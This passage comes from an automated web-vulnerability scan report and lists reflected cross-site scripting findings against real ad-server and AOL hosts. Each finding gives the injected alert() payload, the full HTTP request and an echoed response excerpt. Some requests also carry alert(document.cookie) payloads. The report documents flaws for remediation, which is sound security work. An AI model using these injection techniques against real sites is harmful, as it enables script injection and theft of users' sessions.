g=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=&3ece2"-alert(1)-"d2c7ce0c658=1">
...[SNIP]...

1.16. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [cnt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /adserver/serve/js/fixed_size_unit.jsp

Issue detail

The value of the cnt request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload eb3a3%3balert(1)//c4478348b8 was submitted in the cnt parameter. This input was echoed as eb3a3;alert(1)//c4478348b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserver/serve/js/fixed_size_unit.jsp?pid=16245&codeId=401&cnt=1eb3a3%3balert(1)//c4478348b8&width=574&height=100&pageId=20768960 HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: daily_freq_cap=WzI2LTEtMjAxMXwzNDE0fDFdWzI2LTEtMjAxMXwyMzM5fDFdWzI2LTEtMjAxMXwzNTE1fDJd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDJdWzUtMjAxMXwzMTA4fDJdWzUtMjAxMXwyOTAxfDFdWzUtMjAxMXwyODY4fDFdWzUtMjAxMXwzMDk5fDFdWzUtMjAxMXwyMzM5fDFdWzUtMjAxMXwzNTE1fDJd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDJdWzEtMjAxMXwzMTA4fDJdWzEtMjAxMXwyOTAxfDFdWzEtMjAxMXwyODY4fDFdWzEtMjAxMXwzMDk5fDFdWzEtMjAxMXwyMzM5fDFdWzEtMjAxMXwzNTE1fDJd

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:08 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Connection: close
Content-Length: 4045


               var doclix_ads_domain = document.location.protocol == 'https:' ? document.domain == 'publisher.doclix.com' ? 'publisher.doclix.com' : 'track.doclix.com' : 'ads.doclix.com';
               var doclix_ifrm_url_1eb3a3;alert(1)//c4478348b8 = document.location.protocol+'//'+doclix_ads_domain+'/adserver/serve/js/doclix_ad_ifrm.jsp?';
           
           var ad_setup_str = 'save_ad_code=Save|delete_ad_code=|ad_unit_type_lu=true|unit_standard_size=574
...[SNIP]...

1.17. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [cnt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /adserver/serve/js/fixed_size_unit.jsp

Issue detail

The value of the cnt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec1a1'%3balert(1)//64b668db5b7 was submitted in the cnt parameter. This input was echoed as ec1a1';alert(1)//64b668db5b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserver/serve/js/fixed_size_unit.jsp?pid=16245&codeId=401&cnt=1ec1a1'%3balert(1)//64b668db5b7&width=574&height=100&pageId=20768960 HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: daily_freq_cap=WzI2LTEtMjAxMXwzNDE0fDFdWzI2LTEtMjAxMXwyMzM5fDFdWzI2LTEtMjAxMXwzNTE1fDJd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDJdWzUtMjAxMXwzMTA4fDJdWzUtMjAxMXwyOTAxfDFdWzUtMjAxMXwyODY4fDFdWzUtMjAxMXwzMDk5fDFdWzUtMjAxMXwyMzM5fDFdWzUtMjAxMXwzNTE1fDJd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDJdWzEtMjAxMXwzMTA4fDJdWzEtMjAxMXwyOTAxfDFdWzEtMjAxMXwyODY4fDFdWzEtMjAxMXwzMDk5fDFdWzEtMjAxMXwyMzM5fDFdWzEtMjAxMXwzNTE1fDJd

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:07 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Connection: close
Content-Length: 4077


               var doclix_ads_domain = document.location.protocol == 'https:' ? document.domain == 'publisher.doclix.com' ? 'publisher.doclix.com' : 'track.doclix.com' : 'ads.doclix.com';
               var doclix_i
...[SNIP]...
ick_track != 'undefined')
               doclix_ifrm_url_1ec1a1';alert(1)//64b668db5b7 += '&pub_click_track='+escape(doclix_pub_click_track);
           if (typeof doclix_category != 'undefined')
               doclix_ifrm_url_1ec1a1';alert(1)//64b668db5b7 += '&doclix_cat='+escape(doclix_category);
           if (_get_setting(ad_setup_str, 'unit_ad_number')) {
               _get_setting(ad_setup_str, 'unit_ad_rotate') == 'true' ? ad_number = _get_setting(ad_setup_str,
...[SNIP]...

1.18. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /adserver/serve/js/fixed_size_unit.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9a09'-alert(1)-'64baa0df0a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserver/serve/js/fixed_size_unit.jsp?pid=16245&codeId=401&cnt=1&width=574&height=100&pageId=20768960&c9a09'-alert(1)-'64baa0df0a4=1 HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: daily_freq_cap=WzI2LTEtMjAxMXwzNDE0fDFdWzI2LTEtMjAxMXwyMzM5fDFdWzI2LTEtMjAxMXwzNTE1fDJd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDJdWzUtMjAxMXwzMTA4fDJdWzUtMjAxMXwyOTAxfDFdWzUtMjAxMXwyODY4fDFdWzUtMjAxMXwzMDk5fDFdWzUtMjAxMXwyMzM5fDFdWzUtMjAxMXwzNTE1fDJd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDJdWzEtMjAxMXwzMTA4fDJdWzEtMjAxMXwyOTAxfDFdWzEtMjAxMXwyODY4fDFdWzEtMjAxMXwzMDk5fDFdWzEtMjAxMXwyMzM5fDFdWzEtMjAxMXwzNTE1fDJd

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:08 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Connection: close
Content-Length: 3658


               var doclix_ads_domain = document.location.protocol == 'https:' ? document.domain == 'publisher.doclix.com' ? 'publisher.doclix.com' : 'track.doclix.com' : 'ads.doclix.com';
               var doclix_i
...[SNIP]...
l_str = val_str.substr(0, val_str[iO]('|'));
                   return unescape(val_str);
               } else {return false;}
           }
           doclix_ifrm_url_1 += 'pid=16245&codeId=401&cnt=1&width=574&height=100&pageId=20768960&c9a09'-alert(1)-'64baa0df0a4=1';
           if (typeof doclix_pub_click_track != 'undefined')
               doclix_ifrm_url_1 += '&pub_click_track='+escape(doclix_pub_click_track);
           if (typeof doclix_category != 'undefined')
               doclix_ifrm_
...[SNIP]...

1.19. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [pageId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /adserver/serve/js/fixed_size_unit.jsp

Issue detail

The value of the pageId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39457'-alert(1)-'cf387d9fc83 was submitted in the pageId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserver/serve/js/fixed_size_unit.jsp?pid=16245&codeId=401&cnt=1&width=574&height=100&pageId=2076896039457'-alert(1)-'cf387d9fc83 HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: daily_freq_cap=WzI2LTEtMjAxMXwzNDE0fDFdWzI2LTEtMjAxMXwyMzM5fDFdWzI2LTEtMjAxMXwzNTE1fDJd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDJdWzUtMjAxMXwzMTA4fDJdWzUtMjAxMXwyOTAxfDFdWzUtMjAxMXwyODY4fDFdWzUtMjAxMXwzMDk5fDFdWzUtMjAxMXwyMzM5fDFdWzUtMjAxMXwzNTE1fDJd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDJdWzEtMjAxMXwzMTA4fDJdWzEtMjAxMXwyOTAxfDFdWzEtMjAxMXwyODY4fDFdWzEtMjAxMXwzMDk5fDFdWzEtMjAxMXwyMzM5fDFdWzEtMjAxMXwzNTE1fDJd

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:08 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Connection: close
Content-Length: 3655


               var doclix_ads_domain = document.location.protocol == 'https:' ? document.domain == 'publisher.doclix.com' ? 'publisher.doclix.com' : 'track.doclix.com' : 'ads.doclix.com';
               var doclix_i
...[SNIP]...
al_str = val_str.substr(0, val_str[iO]('|'));
                   return unescape(val_str);
               } else {return false;}
           }
           doclix_ifrm_url_1 += 'pid=16245&codeId=401&cnt=1&width=574&height=100&pageId=2076896039457'-alert(1)-'cf387d9fc83';
           if (typeof doclix_pub_click_track != 'undefined')
               doclix_ifrm_url_1 += '&pub_click_track='+escape(doclix_pub_click_track);
           if (typeof doclix_category != 'undefined')
               doclix_ifrm_ur
...[SNIP]...

1.20. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 223f2<script>alert(1)</script>718630f8bab was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1505691&pid=1990767223f2<script>alert(1)</script>718630f8bab&ps=-1&zw=627&zh=195&url=http%3A//www.dailyfinance.com/&v=5&dct=Business%20News%2C%20Stock%20Quotes%2C%20Investment%20Advice%20-%20DailyFinance&metakw=daily%20finance,dailyfinance,finance%20daily,business%20news,stock%20news,stock%20market%20news HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:06 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "1990767223f2<script>alert(1)</script>718630f8bab"

   
                                                           </head>
...[SNIP]...

1.21. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 6a27b--><script>alert(1)</script>4b7d7d76112 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=15056916a27b--><script>alert(1)</script>4b7d7d76112&pid=1990767&ps=-1&zw=627&zh=195&url=http%3A//www.dailyfinance.com/&v=5&dct=Business%20News%2C%20Stock%20Quotes%2C%20Investment%20Advice%20-%20DailyFinance&metakw=daily%20finance,dailyfinance,finance%20daily,business%20news,stock%20news,stock%20market%20news HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:47:57 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3331


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "15056916a27b--><script>alert(1)</script>4b7d7d76112" -->
...[SNIP]...

1.22. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 25700--><script>alert(1)</script>46ca0f2bc33 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1505691&pid=1990767&ps=-125700--><script>alert(1)</script>46ca0f2bc33&zw=627&zh=195&url=http%3A//www.dailyfinance.com/&v=5&dct=Business%20News%2C%20Stock%20Quotes%2C%20Investment%20Advice%20-%20DailyFinance&metakw=daily%20finance,dailyfinance,finance%20daily,business%20news,stock%20news,stock%20market%20news HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:09 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3770


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-125700--><script>alert(1)</script>46ca0f2bc33" -->
   
...[SNIP]...

1.23. http://adsfac.us/ag.asp [cc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload d3fe7<script>alert(1)</script>a3a3fcc09ff was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=d3fe7<script>alert(1)</script>a3a3fcc09ff&source=js&ord=24803036 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.fanhouse.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSQAN007=pctl=310005&fpt=0%2C310005%2C&pct%5Fdate=4045&pctm=1&FL310005=1&FM30281=1&pctc=30281&FQ=1; FSddf63%3Cscript%3Ealert%28document=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4046&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; FSddf63%3Cscript%3Ealert%281%29%3C%2Fscript%3E8c447564c06=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4045&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; FSQTS038=pctl=287337&pctm=1&fpt=0%2C287337%2C&pct%5Fdate=4053&FL287337=1&FM31975=1&pctc=31975&FQ=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Sun, 06 Feb 2011 20:38:49 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSd3fe7%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea3a3fcc09ff0=uid=15683449; expires=Mon, 07-Feb-2011 20:39:48 GMT; path=/
Set-Cookie: FSd3fe7%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea3a3fcc09ff=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4054&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Sun, 06-Mar-2011 20:39:48 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sun, 06 Feb 2011 20:39:48 GMT
Connection: close

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://ADSFAC.US/link.asp?cc=d3fe7<script>alert(1)</script>a3a3fcc09ff.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

1.24. http://adv-chart-app.app.aol.com/pfsg/sdr [echo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adv-chart-app.app.aol.com
Path:   /pfsg/sdr

Issue detail

The value of the echo request parameter is copied into the XML document as plain text between tags. The payload ad839<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>d81adcd233 was submitted in the echo parameter. This input was echoed as ad839<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>d81adcd233 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /pfsg/sdr?symbols=dji:$indu&service=chartdetail&f=xml&dtype=configurable&tf=d,1&gran=i&fids=i,h,l,o,c,v,pc&q=1&backfill=1&echouri=1&tm=1&dt=1&tr=1&echo=determineTDIsByResponsead839<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>d81adcd233 HTTP/1.1
Host: adv-chart-app.app.aol.com
Proxy-Connection: keep-alive
Referer: http://o.aolcdn.com/os/money/flash/MinimalChart.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; s_sess=%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B%20s_cc%3Dtrue%3B; s_pers=%20s_getnr%3D1297021708679-New%7C1360093708679%3B%20s_nrgvo%3DNew%7C1360093708704%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store,no-cache,max-age=0,must-revalidate,proxy-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/xml;charset=ISO-8859-1
ntCoent-Length: 30296
Date: Sun, 06 Feb 2011 19:51:46 GMT
Content-Length: 30296

<?xml version="1.0" encoding="UTF-8"?>
<response>
   <statusCode>200</statusCode>
   <statusText>OK</statusText>
<echoText>determineTDIsByResponsead839<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>d81adcd233</echoText>
...[SNIP]...

1.25. http://advertising.aol.com/brands/dailyfinance [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /brands/dailyfinance

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3fb31'><script>alert(1)</script>0eb8520e7cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /brands/dailyfinance3fb31'><script>alert(1)</script>0eb8520e7cd HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:20:09 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=536cb75bd33ca159feb9d512a4a6ffdf; expires=Tue, 01 Mar 2011 23:53:29 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 06 Feb 2011 20:20:09 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=86
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 23318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<img src='/sites/default/files/webfm/brand-logos/dailyfinance3fb31'><script>alert(1)</script>0eb8520e7cd.png' alt='dailyfinance3fb31'>
...[SNIP]...

1.26. http://advertising.aol.com/brands/dailyfinance [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /brands/dailyfinance

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c6a5"><script>alert(1)</script>8d254a4718e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /brands/dailyfinance?8c6a5"><script>alert(1)</script>8d254a4718e=1 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:19:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=8609cdea69379ae1f1f7ce98cca77dbc; expires=Tue, 01 Mar 2011 23:53:13 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 06 Feb 2011 20:19:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 28080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a name="aol-share" class="aol-share" href="mailto:yourfriend@email.com?subject=Check this out: AOL Advertising | Brands/DailyFinance&body=http://advertising.aol.com/brands/dailyfinance?8c6a5"><script>alert(1)</script>8d254a4718e=1" title="AOL Advertising | Brands/DailyFinance">
...[SNIP]...

1.27. http://advertising.aol.com/brands/engadget [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /brands/engadget

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bdddb'><script>alert(1)</script>9c1db18b1e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /brands/engadgetbdddb'><script>alert(1)</script>9c1db18b1e0 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
